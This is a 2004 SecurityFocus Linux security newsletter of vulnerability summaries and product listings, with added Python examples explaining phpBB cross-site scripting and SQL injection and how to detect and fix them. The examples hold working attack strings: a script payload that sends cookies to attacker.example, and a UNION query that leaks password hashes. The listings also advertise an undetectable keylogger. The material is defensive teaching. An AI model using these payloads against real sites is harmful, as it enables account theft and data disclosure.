Date: Mon, 22 Mar 2004 13:13:10 -0700 (MST)
From: "John Boletta" <jboletta@securityfocus.com>
To: linux-secnews@securityfocus.com
Subject: SecurityFocus Linux Newsletter #176

SecurityFocus Linux Newsletter #176
------------------------------------

This issue is sponsored by: Reasoning Inc.

Enter to win a free application-level software security inspection -- a
$20,000 value!

Reasoning will inspect up to 100,000 lines of your toughest C/C++ code,
pinpointing the exact location of security vulnerabilities that are the
leading target of hackers. Experience the power that application scanning
and dynamic testing tools can't match.

Enter to win a free software security inspection now:

http://sic-em.steelbrick.com/REA2302/securityfocus-linux.jsp
------------------------------------------------------------------------

I. FRONT AND CENTER
     1. Forensic Analysis of a Live Linux System, Pt. 1
     2. Detection of SQL Injection and Cross-site Scripting Attacks
     3. The 12KB Bomb
II. LINUX VULNERABILITY SUMMARY
     1. Chaogic Systems VHost Unspecified Cross-Site Scripting Vulne...
     2. Emumail EMU Webmail Multiple Vulnerabilities
     3. PHPBB ViewTopic.PHP "postdays" Cross-Site Scripting Vulnerab...
     4. PHPBB ViewForum.PHP "topicdays" Cross-Site Scripting Vulnera...
     5. Check Point Firewall-1 SmartDashboard Filter Buffer Overflow...
     6. YABB/YABB SE Multiple Cross-Site Scripting Vulnerabilities
     7. Multiple Vendor SOAP Server Undisclosed Request Denial Of Se...
     8. PHP-Nuke Modules.php Multiple Cross-Site Scripting Vulnerabi...
     9. PHPBB Search.PHP Search_Results Parameter SQL Injection Vuln...
     10. Lim Unlimited Crafty Command Line Local Buffer Overflow Vuln...
     11. PhpBB admin_words.php Multiple Vulnerabilities
     12. ClamAV RAR Archive Remote Denial Of Service Vulnerability
     13. OpenSSL Denial of Service Vulnerabilities
III. LINUX FOCUS LIST SUMMARY
     1. ModSSL - Knoppix 3.3 (Thread)
IV. NEW PRODUCTS FOR LINUX PLATFORMS
     1. Immunity CANVAS
     2. SecretAgent
     3. Cyber-Ark  Inter-Business Vault
     4. EnCase Forensic Edition
     5. KeyGhost SX
     6. SafeKit
V. NEW TOOLS FOR LINUX PLATFORMS
     1. Qingy Is Not Getty v0.4.0
     2. Network Packet Capture Facility for Java v0.01.15
     3. NetMRG v0.14
     4. Syslog Management Tool v1.0
     5. Prismstumbler v0.7.1
     6. mysqlRadiusd v0.8
VI. UNSUBSCRIBE INSTRUCTIONS
VII. SPONSOR INFORMATION


I. FRONT AND CENTER
-------------------
1. Forensic Analysis of a Live Linux System, Pt. 1
By Mariusz Burdach

This article is the first of a two-part series that provides step-by-step
instructions on forensics of a live Linux system that has been recently
compromised.

http://www.securityfocus.com/infocus/1769

2. Detection of SQL Injection and Cross-site Scripting Attacks
By K. K. Mookhey and Nilesh Burghate

This article discusses techniques to detect SQL injection and cross-site
scripting (XSS) attacks against your networks using regular expressions
with the open-source IDS, Snort.

http://www.securityfocus.com/infocus/1768
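As an added illustration of the approach the article takes (this is
editor-supplied Python, not code from the article, from Snort or from any
project named here), the block below runs simplified forms of the kinds of
patterns it describes over constructed HTTP request lines. The request
lines, the paths, the parameter names and the exact regular expressions are
assumptions made for the illustration; the two ideas worth taking from it
are decoding URL-encoding before matching, so a double-encoded payload
does not slip past a rule that looks for a literal '<', and requiring more
than a lone apostrophe before calling something SQL injection, which is
what keeps "o'neil" from firing the rule.

```python
import re
from urllib.parse import unquote

# Constructed request lines for the demonstration; not from the article and
# not from any real capture. Hosts and scripts are made up.
SAMPLE_REQUESTS = [
    "GET /viewtopic.php?t=12&postdays=0 HTTP/1.1",
    "GET /viewtopic.php?t=12&postdays=%3Cscript%3Ealert(document.cookie)%3C/script%3E HTTP/1.1",
    "GET /search.php?search_results=1%27%20UNION%20SELECT%20user_password%20FROM%20users-- HTTP/1.1",
    "GET /profile.php?name=o%27neil HTTP/1.1",
    "GET /index.php?q=%253Cimg%2520src%253Dx%2520onerror%253Dalert(1)%253E HTTP/1.1",
    "GET /login.php?user=admin%27%20or%20%271%27%3D%271 HTTP/1.1",
]

# Simplified stand-ins for the Snort pcre rules the article discusses. These
# are the editor's own expressions, chosen for readability, not the
# article's exact ones.
SQLI_META = re.compile(r"(?:'|--|#|;)")                      # quote, comment, terminator
SQLI_KEYWORD = re.compile(r"\b(?:union|select|insert|update|delete|drop)\b", re.I)
SQLI_TAUTOLOGY = re.compile(r"'\s*(?:or|and)\b", re.I)       # the classic ' or 1=1
XSS_TAG = re.compile(r"<\s*/?\s*[a-z][a-z0-9]*[^>]*>", re.I)  # any opening/closing tag
XSS_HANDLER = re.compile(r"\bon[a-z]+\s*=", re.I)             # onerror=, onload=, ...


def classify(request_line):
    """Return the set of labels ('sqli', 'xss') a rule would raise for one
    HTTP request line, or an empty set when nothing matches."""
    parts = request_line.split(" ", 2)
    if len(parts) != 3:
        return set()
    target = parts[1]
    # Decode twice: %253C survives a single decode as %3C and would otherwise
    # slip past a rule that looks for a literal '<'.
    decoded = unquote(unquote(target))
    labels = set()
    # A lone quote is a false positive (o'neil); demand a keyword alongside a
    # meta-character, or the quote-then-OR/AND shape of a tautology.
    if SQLI_TAUTOLOGY.search(decoded) or (
        SQLI_KEYWORD.search(decoded) and SQLI_META.search(decoded)
    ):
        labels.add("sqli")
    if XSS_TAG.search(decoded) or XSS_HANDLER.search(decoded):
        labels.add("xss")
    return labels


def scan(request_lines):
    """Map each request line to its labels, dropping lines with none."""
    hits = {}
    for line in request_lines:
        labels = classify(line)
        if labels:
            hits[line] = labels
    return hits


if __name__ == "__main__":
    for line, labels in scan(SAMPLE_REQUESTS).items():
        print(",".join(sorted(labels)), line)
```

The double decode is deliberate and slightly lossy: a legitimate parameter
that really contains "%25" is decoded one step too far, which is acceptable
for a detector but would not be for the application itself.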

3. The 12KB Bomb
By Kelly Martin

It only takes a 12KB virus for total system compromise and a highly
effective spam engine. Anyone can make one. Some assembly required.

http://www.securityfocus.com/columnists/228


II. LINUX VULNERABILITY SUMMARY
-------------------------------
1. Chaogic Systems VHost Unspecified Cross-Site Scripting Vulne...
BugTraq ID: 9860
Remote: Yes
Date Published: Mar 12 2004
Relevant URL: http://www.securityfocus.com/bid/9860
Summary:
It has been reported that the vHost web-based interface is prone to a
remote cross-site scripting vulnerability.  This issue is due to a failure
of the application to properly sanitize user input.

The technical details of this issue cannot be currently described due to
insufficient details, however this BID will be updated as new information
becomes available.

Attackers may exploit this vulnerability to steal authentication
credentials. Other attacks may also be possible.

2. Emumail EMU Webmail Multiple Vulnerabilities
BugTraq ID: 9861
Remote: Yes
Date Published: Mar 12 2004
Relevant URL: http://www.securityfocus.com/bid/9861
Summary:
Multiple vulnerabilities have been identified in the application that may
allow an attacker to carry out cross-site scripting attacks and disclose
the path to the victim's home directory.  The issues are reported to exist
in the login script, 'emumail.fcgi' script and the 'init.emu' sample
script.

EMU Webmail 5.2.7 has been reported to be affected by these issues.

3. PHPBB ViewTopic.PHP "postdays" Cross-Site Scripting Vulnerab...
BugTraq ID: 9865
Remote: Yes
Date Published: Mar 13 2004
Relevant URL: http://www.securityfocus.com/bid/9865
Summary:
It has been reported that one of the scripts included with phpBB is prone
to a cross-site scripting vulnerability.  According to the author of the
report, the script "viewtopic.php" returns the value of the HTML variable
"postdays" to the client as its output without encoding it or otherwise
removing potentially hostile content.  This can be exploited by
constructing malicious links with the malicious "postdays" variable value
embedded as a GET request style HTML variable.  If the target user visits
such a link, the malicious, externally created content supplied in the
link will be rendered (or executed, in the case of script code) as part of
the viewtopic.php document and within the context of the vulnerable
website (including the phpBB forum).

4. PHPBB ViewForum.PHP "topicdays" Cross-Site Scripting Vulnera...
BugTraq ID: 9866
Remote: Yes
Date Published: Mar 13 2004
Relevant URL: http://www.securityfocus.com/bid/9866
Summary:
It has been reported that one of the scripts included with phpBB is prone
to a cross-site scripting vulnerability.  According to the author of the
report, the script "viewforum.php" returns the value of the HTML variable
"topicdays" to the client as its output without encoding it or otherwise
removing potentially hostile content.  This can be exploited by
constructing malicious links with the malicious "topicdays" variable value
embedded as a GET request style HTML variable.  If the target user visits
such a link, the malicious, externally created content supplied in the
link will be rendered (or executed, in the case of script code) as part of
the viewforum.php document and within the context of the vulnerable
website (including the phpBB forum).
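Entries 3 and 4 describe the same reflected cross-site scripting pattern
in two scripts. The block below is an editor-supplied Python illustration
of that pattern and of its fix; it is not phpBB code and does not
reproduce phpBB's templates. It assumes the parameter is meant to be a
count of days (which is what "postdays" and "topicdays" select in phpBB),
so the fix is to coerce it to a non-negative integer and still HTML-encode
it on output. The host names, the payload and the <option> fragment are
assumptions made for the illustration.

```python
import html
from urllib.parse import parse_qs, urlencode

# Constructed payload: breaks out of the attribute, then ships the cookie to
# a made-up attacker host. Not taken from the report.
PAYLOAD = ('"><script>document.location="http://attacker.example/?c="'
           '+document.cookie</script>')


def render_vulnerable(query_string, param="postdays"):
    """Reflect the parameter into the page exactly as received (the bug)."""
    params = parse_qs(query_string, keep_blank_values=True)
    value = params.get(param, ["0"])[0]
    return f'<option value="{value}" selected>{value}</option>'


def render_hardened(query_string, param="postdays"):
    """Validate the parameter as a non-negative integer, then HTML-encode it."""
    params = parse_qs(query_string, keep_blank_values=True)
    raw = params.get(param, ["0"])[0]
    try:
        days = int(raw)
    except ValueError:
        days = 0          # anything that is not an integer falls back to the default
    if days < 0:
        days = 0
    # The integer check alone strips the markup; encoding stays as a second
    # layer in case a later change lets a string through this path.
    safe = html.escape(str(days), quote=True)
    return f'<option value="{safe}" selected>{safe}</option>'


def attack_query(param="postdays", topic=12):
    """Encode the payload the way a browser sends it in a GET request."""
    return urlencode({"t": topic, param: PAYLOAD})


def attack_url(script="viewtopic.php", param="postdays", topic=12):
    """The kind of link the entries describe; forum.example is made up."""
    return f"http://forum.example/{script}?{attack_query(param, topic)}"


def is_exploitable(render, query_string, param="postdays"):
    """True when the script tag from the crafted query survives into the output."""
    return "<script>" in render(query_string, param)


if __name__ == "__main__":
    for script, param in (("viewtopic.php", "postdays"),
                          ("viewforum.php", "topicdays")):
        q = attack_query(param)
        print(script, "vulnerable:", is_exploitable(render_vulnerable, q, param),
              "hardened:", is_exploitable(render_hardened, q, param))
```

The order matters: type-check on input, encode on output. Encoding alone
would also close this hole, but a parameter that is only ever an integer
should never reach the template as a string in the first place.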

5. Check Point Firewall-1 SmartDashboard Filter Buffer Overflow...
BugTraq ID: 9870
Remote: Yes
Date Published: Mar 15 2004
Relevant URL: http://www.securityfocus.com/bid/9870
Summary:
It has been reported that Check Point Firewall-1 SmartDashboard may be
prone to a buffer overflow vulnerability that may allow an attacker to
execute arbitrary code on a vulnerable system in order to gain
unauthorized access.  The issue is reported to present itself when the
SmartTracker utility is used to add a firewall filter for Firewall-1.  An
attacker may be able to cause a buffer overflow condition by supplying an
excessive amount of data via the filter line.

It is likely that access to SmartDashboard requires administrator
credentials, in which case this issue would not be considered a
vulnerability.  This has not been confirmed at the moment.  Due to a lack
of information further details cannot be outlined at the moment.  This BID
will be updated as more information becomes available.

This vulnerability is reported to affect SmartDashboard supplied with
Check Point Software NG-AI R54 and NG-AI R55, however, other versions
could be affected as well.

6. YABB/YABB SE Multiple Cross-Site Scripting Vulnerabilities
BugTraq ID: 9873
Remote: Yes
Date Published: Mar 15 2004
Relevant URL: http://www.securityfocus.com/bid/9873
Summary:
It has been reported that YaBB and YaBB SE are prone to multiple
cross-site scripting vulnerabilities.  These issues are due to a failure
of the applications to properly validate URI supplied user input.

Attackers may exploit these vulnerabilities to steal authentication
credentials. Other attacks may also be possible.

7. Multiple Vendor SOAP Server Undisclosed Request Denial Of Se...
BugTraq ID: 9877
Remote: Yes
Date Published: Mar 15 2004
Relevant URL: http://www.securityfocus.com/bid/9877
Summary:
A problem has been identified in several different SOAP servers when
handling certain types of requests. Because of this, it is possible for an
attacker to force a denial of service on systems using a vulnerable
implementation.

This BID will be updated as further details regarding this vulnerability
are made public.

8. PHP-Nuke Modules.php Multiple Cross-Site Scripting Vulnerabi...
BugTraq ID: 9879
Remote: Yes
Date Published: Mar 15 2004
Relevant URL: http://www.securityfocus.com/bid/9879
Summary:
It has been reported that PHP-Nuke may be prone to multiple cross-site
scripting vulnerabilities.  These vulnerabilities occur due to
insufficient sanitization of user-supplied data via the 'Your Name',
'nicname', 'fname', 'ratenum', and 'search' fields of the 'modules.php'
script.  Exploitation could allow for theft of cookie-based authentication
credentials. Other attacks are also possible.

PHP-Nuke 7.1.0 has been reported to be prone to these issues, however, it
is possible that other versions are affected as well.  These issues are
undergoing further analysis.  These issues will be separated into
individual BIDs once analysis is complete.

9. PHPBB Search.PHP Search_Results Parameter SQL Injection Vuln...
BugTraq ID: 9883
Remote: Yes
Date Published: Mar 15 2004
Relevant URL: http://www.securityfocus.com/bid/9883
Summary:
A vulnerability has been reported to exist in the software that may allow
a remote user to inject malicious SQL syntax into database queries. The
problem reportedly exists in one of the parameters of the search.php
script. This issue is caused by insufficient sanitization of user-supplied
data. A remote attacker may exploit this issue to influence SQL query
logic to disclose sensitive information that could be used to gain
unauthorized access.
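The entry does not say which parameter is affected or how it is used, so
the following editor-supplied Python (not phpBB code) assumes, purely for
illustration, a search results parameter that carries a comma-separated
list of post IDs dropped into an IN (...) clause. It shows how a value
that closes the list and appends a UNION pulls rows out of an unrelated
table, and the fix of validating the list as integers and binding each one.
The schema, rows, table names and the hash value are constructed for the
example.

```python
import sqlite3

# Constructed hash (md5 of "password") so the leak is easy to spot in results.
PASSWORD_HASH = "5f4dcc3b5aa765d61d8327deb882cf99"

# Closes the IN list, appends a UNION over the users table and comments out
# whatever the script placed after the parameter. Constructed for the example.
PAYLOAD = "1) UNION SELECT user_id, user_password FROM users --"


def make_db():
    """In-memory tables loosely modelled on a forum; not phpBB's schema."""
    conn = sqlite3.connect(":memory:")
    conn.executescript(f"""
        CREATE TABLE posts (post_id INTEGER PRIMARY KEY, post_text TEXT);
        CREATE TABLE users (user_id INTEGER PRIMARY KEY, username TEXT,
                            user_password TEXT);
        INSERT INTO posts VALUES (1, 'hello world'), (2, 'patch tuesday');
        INSERT INTO users VALUES (1, 'admin', '{PASSWORD_HASH}');
    """)
    return conn


def search_vulnerable(conn, search_results):
    """Interpolate the parameter into the statement: the attacker edits the query."""
    sql = ("SELECT post_id, post_text FROM posts "
           f"WHERE post_id IN ({search_results})")
    return conn.execute(sql).fetchall()


def search_hardened(conn, search_results):
    """Accept only comma-separated decimal integers and bind each as a parameter."""
    parts = [p.strip() for p in search_results.split(",") if p.strip()]
    ids = []
    for part in parts:
        if not part.isdecimal():
            raise ValueError(f"rejected non-numeric post id: {part!r}")
        ids.append(int(part))
    if not ids:
        return []
    placeholders = ",".join("?" * len(ids))   # one bound slot per id
    sql = ("SELECT post_id, post_text FROM posts "
           f"WHERE post_id IN ({placeholders})")
    return conn.execute(sql, ids).fetchall()


def leaks_hash(rows):
    """True when any returned row carries the users.user_password value."""
    return any(PASSWORD_HASH in row for row in rows)


if __name__ == "__main__":
    db = make_db()
    print("vulnerable:", search_vulnerable(db, PAYLOAD))
    try:
        search_hardened(db, PAYLOAD)
    except ValueError as err:
        print("hardened:", err)
```

Note that the hardened version still builds the placeholder list with
string formatting; that is fine because only the number of "?" markers
comes from the input, never its content.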

10. Lim Unlimited Crafty Command Line Local Buffer Overflow Vuln...
BugTraq ID: 9893
Remote: No
Date Published: Mar 16 2004
Relevant URL: http://www.securityfocus.com/bid/9893
Summary:
It has been reported that the Crafty game program may be prone to a local
buffer overflow vulnerability that may allow an attacker to execute
arbitrary code in order to gain elevated privileges.  The issue presents
itself due to insufficient bounds checking performed by 'crafty.bin' on
user-supplied data via the command line.

This problem could result in the execution of arbitrary code in the
context of the vulnerable process, and may result in a local user gaining
elevated privileges.  As with any local overflow, that elevation only
occurs where 'crafty.bin' is installed setuid or setgid; otherwise the
attacker gains nothing beyond the access they already have.

Crafty versions 19.3 and prior are reportedly affected by this issue.

11. PhpBB admin_words.php Multiple Vulnerabilities
BugTraq ID: 9896
Remote: Yes
Date Published: Mar 16 2004
Relevant URL: http://www.securityfocus.com/bid/9896
Summary:
It has been reported that PhpBB may be prone to multiple vulnerabilities
that may allow an attacker to carry out SQL injection and cross-site
scripting attacks.  These issues are reported to affect the 'id' parameter
of the 'admin_words.php' module.  The SQL injection attack requires
administrator level access.

PhpBB version 2.0.6c has been reported to be affected by these issues,
however, it is possible that other versions are affected as well.

12. ClamAV RAR Archive Remote Denial Of Service Vulnerability
BugTraq ID: 9897
Remote: Yes
Date Published: Mar 16 2004
Relevant URL: http://www.securityfocus.com/bid/9897
Summary:
ClamAV has been reported prone to a remote denial of service
vulnerability. The issue presents itself when a RAR archive that is
created by variants of the W32.Beagle.A@mm worm (MCID 2443) is
encountered.

13. OpenSSL Denial of Service Vulnerabilities
BugTraq ID: 9899
Remote: Yes
Date Published: Mar 17 2004
Relevant URL: http://www.securityfocus.com/bid/9899
Summary:
Three security vulnerabilities have been reported to affect OpenSSL.  Each
of these remotely exploitable issues may result in a denial of service in
applications which use OpenSSL.

The first vulnerability is a NULL pointer assignment that can be triggered
by attackers during SSL/TLS handshake exchanges.  The CVE candidate name
for this vulnerability is CAN-2004-0079.  Versions 0.9.6c to 0.9.6k
(inclusive) and from 0.9.7a to 0.9.7c (inclusive) are vulnerable.

The second vulnerability is also exploited during the SSL/TLS handshake,
though only when Kerberos ciphersuites are in use. The vendor has reported
that this vulnerability may not be a threat to many as it is only present
when Kerberos ciphersuites are in use, an uncommon configuration.  The CVE
candidate name for this vulnerability is CAN-2004-0112.  Versions 0.9.7a,
0.9.7b, and 0.9.7c are affected.

The vendor's fixed releases for these issues are OpenSSL 0.9.6m and
0.9.7d.  Note that OpenSSL is statically linked into some applications,
so upgrading the shared library alone does not cover every consumer.

This entry will be retired when individual BID records are created for
each issue.

*Note: A third denial of service vulnerability included in the
announcement was discovered affecting 0.9.6 and fixed in 0.9.6d.  The CVE
candidate name for this vulnerability is CAN-2004-0081.


III. LINUX FOCUS LIST SUMMARY
-----------------------------
1. ModSSL - Knoppix 3.3 (Thread)
Relevant URL:

http://www.securityfocus.com/archive/91/357693


IV. NEW PRODUCTS FOR LINUX PLATFORMS
------------------------------------
1. Immunity CANVAS
By: Immunity, Inc.
Platforms: Linux, Windows 2000
Relevant URL: http://www.immunitysec.com/CANVAS/
Summary:

Immunity CANVAS is 100% pure Python, and every license includes full
access to the entire CANVAS codebase. Python is one of the easiest
languages to learn, so even novice programmers can be productive on the
CANVAS API, should they so choose.

Immunity CANVAS is both a valuable demonstration tool for enterprise
information security teams or system administrators, and an advanced
development platform for exploit developers, or people learning to become
exploit developers.

2. SecretAgent
By: Information Security Corporation (ISC)
Platforms: Linux, MacOS, UNIX, Windows 2000, Windows 95/98, Windows NT,
Windows XP
Relevant URL: http://www.infoseccorp.com/products/secretagent/contents.htm
Summary:

SecretAgent is a file encryption and digital signature utility, supporting
cross-platform interoperability over a wide range of platforms: Windows,
Linux, Mac OS X, and UNIX systems.

It's the perfect solution for your data security requirements, regardless
of the size of your organization.

Using the latest recognized standards in encryption and digital signature
technology, SecretAgent ensures the confidentiality, integrity, and
authenticity of your data.

3. Cyber-Ark  Inter-Business Vault
By: Cyber-Ark
Platforms: Linux, Windows 2000, Windows NT, Windows XP
Relevant URL:
http://www.cyber-ark.com/datasecuritysoftware/inter-business_vault.htm
Summary:

Based on Cyber-Ark Software's Vaulting Technology, the Inter-Business
Vault is an information security solution that enables organizations to
safely overcome traditional network boundaries in order to securely share
business information among customers, business partners, and remote
branches. It provides a seamless, LAN-like experience over the Internet
that includes all the security, performance, accessibility, and ease of
administration required to allow organizations to share everyday
information worldwide.

4. EnCase Forensic Edition
By: Guidance Software Inc.
Platforms: DOS, FreeBSD, Linux, MacOS, NetBSD, OpenBSD, PalmOS, Solaris,
UNIX, Windows 2000, Windows 95/98, Windows NT, Windows XP
Relevant URL:
http://www.guidancesoftware.com/products/EnCaseForensic/index.shtm
Summary:

EnCase Forensic Edition Version 4 delivers the most advanced features for
computer forensics and investigations. With an intuitive GUI and superior
performance, EnCase Version 4 provides investigators with the tools to
conduct large-scale and complex investigations with accuracy and
efficiency. Guidance Software's award winning solution yields completely
non-invasive computer forensic investigations while allowing examiners to
easily manage large volumes of computer evidence and view all relevant
files, including "deleted" files, file slack and unallocated space.

The integrated functionality of EnCase allows the examiner to perform all
functions of the computer forensic investigation process. EnCase's
EnScript, a powerful macro-programming language and API included within
EnCase, allows investigators to build customized and reusable forensic
scripts.

5. KeyGhost SX
By: KeyGhost Ltd
Platforms: BeOS, DOS, Linux, OS/2, Solaris, SunOS, Windows 2000, Windows
95/98, Windows NT, Windows XP
Relevant URL: http://www.keyghost.com/SX/
Summary:

KeyGhost SX discreetly captures and records all keystrokes typed,
including chat conversations, email, word processor, or even activity
within an accounting or specialist system. It is completely undetectable
by software scanners and provides you with one of the most powerful
stealth surveillance applications offered anywhere.

Because KeyGhost uses STRONG 128-Bit encryption to store the recorded data
in its own internal memory (not on the hard drive), it is impossible for
a network intruder to gain access to any sensitive data stored within the
device.

6. SafeKit
By: Evidian Inc.
Platforms: AIX, HP-UX, Linux, Solaris, Windows 2000
Relevant URL: http://www.evidian.com/safekit/index.htm
Summary:

Evidian's SafeKit technology makes it possible to render any application
available 24 hours per day. With no extra hardware: just use your existing
servers and install this software-only solution.

This provides ultimate scalability. As your needs grow, all you need to do
is add more standard servers into the cluster. With the load balancing
features of SafeKit, you can distribute applications over multiple
servers. If one system fails completely, the others will continue to serve
your users.


V. NEW TOOLS FOR LINUX PLATFORMS
--------------------------------
1. Qingy Is Not Getty v0.4.0
By: Noberasco
Relevant URL: http://qingy.sourceforge.net/
Platforms: Linux, POSIX
Summary:

qingy is a replacement for getty. It uses DirectFB to provide a fast, nice
GUI without the overhead of the X Window System. It allows the user to
log in and start the session of his choice (text console, GNOME, KDE,
wmaker, etc.).

2. Network Packet Capture Facility for Java v0.01.15
By: patrick charles
Relevant URL: http://jpcap.sourceforge.net
Platforms: Linux, Solaris, SunOS
Summary:

Network Packet Capture Facility for Java is a set of Java classes that
provide an interface and system for network packet capture. A protocol
library and tool for visualizing network traffic is included. It utilizes
libpcap, a widely used system library for packet capture.

3. NetMRG v0.14
By: Brady Alleman
Relevant URL: http://www.netmrg.net/
Platforms: Linux
Summary:

NetMRG is a network monitoring, reporting, and graphing system. Using
MySQL, PHP, C++, pthreads, and RRDTOOL, it is capable of monitoring
thousands of variables on five-minute intervals. Graph templating allows
network admins to begin monitoring devices with minimal overhead. NetMRG
is also capable of responding to programmable events, such as variables
exceeding accepted tolerances. It can accommodate server hosting and
Internet service provider environments with different users allowed to
view only their own equipment's graphs.

4. Syslog Management Tool v1.0
By: Jeremy Guthrie
Relevant URL: http://smt.dangermen.com
Platforms: FreeBSD, Linux, NetBSD, OpenBSD
Summary:

The Syslog Management Tool (SMT) is a Web-based system that collects
syslog messages using a modified version of Modular Syslog. It processes
them for errors and generates alerts, launches programs, or sends emails
based on user-defined actions. Since it uses a Web console, rules, hosts,
and much more can be centrally managed. It is designed to be disaster
resilient by distributing components throughout a global enterprise to
survive Web console loss, database loss, or syslog server loss.

5. Prismstumbler v0.7.1
By: Florian Boor
Relevant URL: http://prismstumbler.sourceforge.net/
Platforms: Linux, POSIX
Summary:

Prismstumbler is software which finds 802.11 (W-LAN) networks. It comes
with an easy to use GTK2 frontend and is small enough to fit on a small
portable system. It is designed to be a flexible tool to find as much
information about wireless LAN installations as possible. Because of its
client-server architecture the scanner engine may be used for different
frontends.

6. mysqlRadiusd v0.8
By: Gary Wallis <ggw@anet.net>
Relevant URL: http://openisp.net/mysqlRadius
Platforms: FreeBSD, Linux, Solaris, SunOS, UNIX
Summary:

mysqlRadiusd is a RADIUS daemon based on the 1.6.6 Cistron distribution
and the MySQL patches that has been modified for use with the mysqlISP GPL
ISP management software system. It is very stable and can handle large
ISPs easily while pumping mass accounting records into the mysqlRadacct
subsystem at a tremendous rate from even multi-server clusters.

VII. SPONSOR INFORMATION
------------------------
This issue is sponsored by: Reasoning Inc.

Enter to win a free application-level software security inspection -- a
$20,000 value!

Reasoning will inspect up to 100,000 lines of your toughest C/C++ code,
pinpointing the exact location of security vulnerabilities that are the
leading target of hackers. Experience the power that application scanning
and dynamic testing tools can't match.

Enter to win a free software security inspection now:

http://sic-em.steelbrick.com/REA2302/securityfocus-linux.jsp
------------------------------------------------------------------------